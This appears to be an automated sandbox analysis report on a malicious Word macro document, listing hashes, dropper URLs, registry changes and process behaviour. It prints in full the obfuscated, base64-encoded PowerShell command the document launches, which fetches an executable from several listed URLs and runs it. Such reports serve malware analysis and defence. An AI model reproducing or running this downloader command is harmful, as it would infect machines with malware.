8a7c7754_OUZnG00tUJ

13-09-2021 08:56

210913-kwg75agdgp 10

05-09-2021 05:09

210905-fs9qraega4 10

max time kernel137s
max time network139s
platformwindows7_x64
resourcewin7-en
submitted13-09-2021 08:56

Report
Files
Registry
Network
Processes
Mutex
Misc

Target

8a7c7754_OUZnG00tUJ.doc

Filesize

176KB

Completed

13-09-2021 08:59

Score

10^/10

MD5

8a7c7754300dab0670eaf86357a5463d

SHA1

6feb3edf05a2170772cdaef20d76b7e8e07c7b81

SHA256

e9325a711e0f6f605b85898c5b507d4320e1f1dc672c68172b06cda359b5107e

Extracted

Language	ps1
Source
URLs	https://santyago.org/wp-content/0mcYS6/ http://dandyair.com/font-awesome/rOOAL/ https://www.tekadbatam.com/wp-content/AUiw/ http://kellymorganscience.com/wp-content/SCsWM/ https://tewoerd.eu/img/DALSKE/ http://mediainmedia.com/plugin_opencart2.3-master/Atye/ http://nuwagi.com/old/XLGjc/ exe.dropper https://santyago.org/wp-content/0mcYS6/ exe.dropper http://dandyair.com/font-awesome/rOOAL/ exe.dropper https://www.tekadbatam.com/wp-content/AUiw/ exe.dropper http://kellymorganscience.com/wp-content/SCsWM/ exe.dropper https://tewoerd.eu/img/DALSKE/ exe.dropper http://mediainmedia.com/plugin_opencart2.3-master/Atye/ exe.dropper http://nuwagi.com/old/XLGjc/

Defense Evasion

Process spawned unexpected child process

powershell.exe

Description

This typically indicates the parent process was compromised via an exploit or macro.

Reported IOCs

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1760	1016	powershell.exe

Blocklisted process makes network request

powershell.exe

Reported IOCs

flow	pid	process
7	1760	powershell.exe
8	1760	powershell.exe
10	1760	powershell.exe
12	1760	powershell.exe
14	1760	powershell.exe
16	1760	powershell.exe
18	1760	powershell.exe
19	1760	powershell.exe
21	1760	powershell.exe
23	1760	powershell.exe
24	1760	powershell.exe
25	1760	powershell.exe

Drops file in System32 directory

powershell.exe

Reported IOCs

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory
WINWORD.EXE

Reported IOCs

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings

WINWORD.EXE

TTPs

Modify Registry

Reported IOCs

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE

Modifies registry class

WINWORD.EXE

Reported IOCs

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\TypeLib\{051C120B-361E-4101-802F-4BCCA9736393}\2.0\HELPDIR	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\TypeLib\{051C120B-361E-4101-802F-4BCCA9736393}\2.0\ = "Microsoft Forms 2.0 Object Library"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\TypeLib\{051C120B-361E-4101-802F-4BCCA9736393}\2.0\FLAGS	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{051C120B-361E-4101-802F-4BCCA9736393}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\TypeLib\{051C120B-361E-4101-802F-4BCCA9736393}\2.0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener
WINWORD.EXE

Reported IOCs

pid process

1648 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses
powershell.exe

Reported IOCs

pid process

1760 powershell.exe
Suspicious use of AdjustPrivilegeToken
powershell.exe

Reported IOCs

description pid process

Token: SeDebugPrivilege 1760 powershell.exe
Suspicious use of SetWindowsHookEx
WINWORD.EXE

Reported IOCs

pid process

1648 WINWORD.EXE
1648 WINWORD.EXE

pid	process
1648	WINWORD.EXE

pid	process
1760	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1760	powershell.exe

pid	process
1648	WINWORD.EXE
1648	WINWORD.EXE

Suspicious use of WriteProcessMemory

WINWORD.EXE

Reported IOCs

description	pid	process	target process
PID 1648 wrote to memory of 1588	1648	WINWORD.EXE	splwow64.exe
PID 1648 wrote to memory of 1588	1648	WINWORD.EXE	splwow64.exe
PID 1648 wrote to memory of 1588	1648	WINWORD.EXE	splwow64.exe
PID 1648 wrote to memory of 1588	1648	WINWORD.EXE	splwow64.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8a7c7754_OUZnG00tUJ.doc"

Drops file in Windows directory
Modifies Internet Explorer settings
Modifies registry class
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory

PID:1648

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

PID:1588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -en JABUADEAeAB5AHkAeQB4AD0AKAAoACcASwAnACsAJwBrAHkAbQAnACkAKwAoACcAXwA0ACcAKwAnAGsAJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABFAG4AVgA6AFUAUwBFAHIAUABSAE8ARgBpAEwAZQBcAHUANgB3ADcATwBfAGwAXABQAFMAagBrADMAcABOAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQBSAEUAQwB0AE8AUgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBjAFUAUgBpAGAAVABgAHkAUAByAG8AVABvAGMAYABvAEwAIgAgAD0AIAAoACgAJwB0ACcAKwAnAGwAcwAxADIAJwApACsAJwAsACAAJwArACgAJwB0ACcAKwAnAGwAcwAxADEAJwApACsAJwAsACcAKwAoACcAIAB0ACcAKwAnAGwAcwAnACkAKQA7ACQARQByAG8AcwAzAGYAYwAgAD0AIAAoACgAJwBEACcAKwAnAHoAZAAnACkAKwAoACcAcwAnACsAJwB5AHEAeABiACcAKQApADsAJABHAHIAdgBuAGYAcwAzAD0AKAAoACcARAAzAGIAcwAnACsAJwBvACcAKQArACcAbQBmACcAKQA7ACQAQQBrADEAYwBkAHcAcQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAEYAJwArACcAeAAnACsAJwAyAFUAJwArACcANgB3ADcAbwBfAGwAJwApACsAJwBGACcAKwAoACcAeAAnACsAJwAyAFAAcwBqACcAKQArACcAawAnACsAJwAzACcAKwAnAHAAJwArACgAJwBuACcAKwAnAEYAeAAnACkAKwAnADIAJwApAC0AUgBFAHAAbABhAGMARQAgACAAKAAnAEYAeAAnACsAJwAyACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACsAJABFAHIAbwBzADMAZgBjACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABZAHMAZQBtAF8AcwA0AD0AKAAoACcATgAnACsAJwBnAGMAJwApACsAJwBtADcAJwArACcAdgBrACcAKQA7ACQATgBjADIAeQAwAG8AMgA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBFAFQALgB3AGUAYgBjAGwAaQBlAG4AdAA7ACQASAA1AHQANQA1AG8AawA9ACgAJwBoAHQAJwArACcAdAAnACsAKAAnAHAAcwA6ACcAKwAnAC8ALwBzACcAKwAnAGEAJwApACsAJwBuAHQAJwArACgAJwB5AGEAJwArACcAZwAnACkAKwAoACcAbwAuAG8AcgBnACcAKwAnAC8AJwApACsAJwB3ACcAKwAoACcAcAAtAGMAbwBuACcAKwAnAHQAJwApACsAJwBlAG4AJwArACcAdAAvACcAKwAoACcAMABtACcAKwAnAGMAWQBTADYAJwApACsAKAAnAC8AJwArACcAKgBoAHQAJwApACsAKAAnAHQAcAAnACsAJwA6AC8ALwBkACcAKQArACcAYQAnACsAKAAnAG4AZAAnACsAJwB5ACcAKQArACcAYQBpACcAKwAnAHIALgAnACsAJwBjAG8AJwArACgAJwBtAC8AZgBvACcAKwAnAG4AdAAnACsAJwAtAGEAJwApACsAKAAnAHcAJwArACcAZQBzAG8AbQAnACkAKwAoACcAZQAvAHIAJwArACcATwAnACkAKwAoACcATwAnACsAJwBBACcAKwAnAEwALwAqAGgAdAB0ACcAKQArACgAJwBwAHMAOgAvACcAKwAnAC8AdwB3AHcALgAnACsAJwB0AGUAawAnACsAJwBhAGQAYgBhAHQAYQBtAC4AYwBvACcAKQArACgAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwAnACkAKwAoACcAbgB0ACcAKwAnAGUAJwApACsAJwBuACcAKwAnAHQALwAnACsAKAAnAEEAVQBpACcAKwAnAHcALwAnACkAKwAoACcAKgBoACcAKwAnAHQAdABwACcAKwAnADoALwAvAGsAJwArACcAZQAnACkAKwAoACcAbABsACcAKwAnAHkAJwApACsAJwBtACcAKwAoACcAbwByAGcAYQBuACcAKwAnAHMAYwAnACsAJwBpAGUAJwApACsAJwBuAGMAJwArACgAJwBlAC4AJwArACcAYwAnACkAKwAoACcAbwBtAC8AdwAnACsAJwBwAC0AYwAnACsAJwBvACcAKQArACgAJwBuAHQAJwArACcAZQAnACkAKwAoACcAbgAnACsAJwB0AC8AUwAnACkAKwAoACcAQwBzACcAKwAnAFcATQAvACcAKwAnACoAaAB0AHQAcAAnACkAKwAoACcAcwA6AC8AJwArACcALwB0ACcAKQArACcAZQAnACsAKAAnAHcAbwAnACsAJwBlACcAKQArACcAcgAnACsAJwBkACcAKwAnAC4AJwArACcAZQB1ACcAKwAoACcALwAnACsAJwBpAG0AZwAvAEQAQQAnACsAJwBMAFMAJwApACsAJwBLACcAKwAnAEUAJwArACgAJwAvACcAKwAnACoAaAB0AHQAcAAnACkAKwAoACcAOgAnACsAJwAvAC8AJwApACsAKAAnAG0AZQAnACsAJwBkACcAKQArACcAaQBhACcAKwAoACcAaQBuACcAKwAnAG0AZQAnACkAKwAoACcAZABpACcAKwAnAGEAJwApACsAJwAuAGMAJwArACgAJwBvAG0ALwAnACsAJwBwAGwAJwApACsAJwB1ACcAKwAoACcAZwBpAG4AXwBvAHAAJwArACcAZQBuACcAKQArACgAJwBjAGEAcgB0ACcAKwAnADIAJwApACsAKAAnAC4AMwAtACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAcwB0ACcAKwAnAGUAcgAvACcAKQArACgAJwBBAHQAeQAnACsAJwBlAC8AKgBoACcAKwAnAHQAJwApACsAJwB0ACcAKwAoACcAcAAnACsAJwA6AC8ALwAnACkAKwAoACcAbgB1AHcAYQAnACsAJwBnAGkALgBjAG8AJwArACcAbQAvAG8AbAAnACsAJwBkACcAKwAnAC8AWABMAEcAagBjAC8AJwApACkALgAiAHMAUABgAEwAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUAAxAHAAZwBiAGwAagA9ACgAKAAnAFgAaQAnACsAJwA2ACcAKQArACgAJwBiACcAKwAnAGkAaQAyACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAWABoAHoANwBuAGsAbQAgAGkAbgAgACQASAA1AHQANQA1AG8AawApAHsAdAByAHkAewAkAE4AYwAyAHkAMABvADIALgAiAGQAbwBXAE4ATABPAGAAQQBkAGYASQBgAEwAZQAiACgAJABYAGgAegA3AG4AawBtACwAIAAkAEEAawAxAGMAZAB3AHEAKQA7ACQAWQBrADEAMABzADEAXwA9ACgAKAAnAFMAJwArACcAbgA1ADAAcAAnACkAKwAnAHAAagAnACkAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAQQBrADEAYwBkAHcAcQApAC4AIgBsAGUAbgBgAEcAdABoACIAIAAtAGcAZQAgADMAMQAyADMAOQApACAAewAmACgAJwBJAG4AdgAnACsAJwBvACcAKwAnAGsAZQAtAEkAdAAnACsAJwBlAG0AJwApACgAJABBAGsAMQBjAGQAdwBxACkAOwAkAFkAOAB6ADkAMABnAHgAPQAoACgAJwBJAHEAMgAnACsAJwB5ACcAKQArACgAJwAzAF8AJwArACcAawAnACkAKQA7AGIAcgBlAGEAawA7ACQAUwBvAHYANwBsAHYANwA9ACgAJwBSACcAKwAnAHMAJwArACgAJwB6ACcAKwAnAHIAawBuAHIAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEgAdQBrAGwAYwBxAF8APQAoACgAJwBCADEAZwAnACsAJwBrACcAKQArACcAaQAnACsAJwBkADkAJwApAA==

Process spawned unexpected child process
Blocklisted process makes network request
Drops file in System32 directory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken

PID:1760

Collection

Command and Control

Credential Access

Defense Evasion

Modify Registry

Discovery

Execution

Exfiltration

Impact

Initial Access

Lateral Movement

Persistence

Privilege Escalation

00:00 00:00

memory/1588-64-0x0000000000000000-mapping.dmp

Download
memory/1648-52-0x0000000072221000-0x0000000072224000-memory.dmp

Download
memory/1648-53-0x000000006FCA1000-0x000000006FCA3000-memory.dmp

Download
memory/1648-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

Download
memory/1648-55-0x0000000076041000-0x0000000076043000-memory.dmp

Download
memory/1648-57-0x0000000005720000-0x000000000636A000-memory.dmp

Download
memory/1648-66-0x000000005FFF0000-0x0000000060000000-memory.dmp

Download
memory/1760-61-0x0000000002814000-0x0000000002817000-memory.dmp

Download
memory/1760-59-0x0000000002810000-0x0000000002812000-memory.dmp

Download
memory/1760-58-0x000007FEF2930000-0x000007FEF348D000-memory.dmp

Download
memory/1760-62-0x000000001B720000-0x000000001BA1F000-memory.dmp

Download
memory/1760-63-0x000000000281B000-0x000000000283A000-memory.dmp

Download
memory/1760-56-0x000007FEFB731000-0x000007FEFB733000-memory.dmp

Download
memory/1760-60-0x0000000002812000-0x0000000002814000-memory.dmp

Download

8a7c7754_OUZnG00tUJ

Extracted

Filter: none

Description

Reported IOCs

Reported IOCs

Reported IOCs

Reported IOCs

Tags

TTPs

Reported IOCs

Reported IOCs

Reported IOCs

Reported IOCs

Reported IOCs

Reported IOCs

Reported IOCs

Title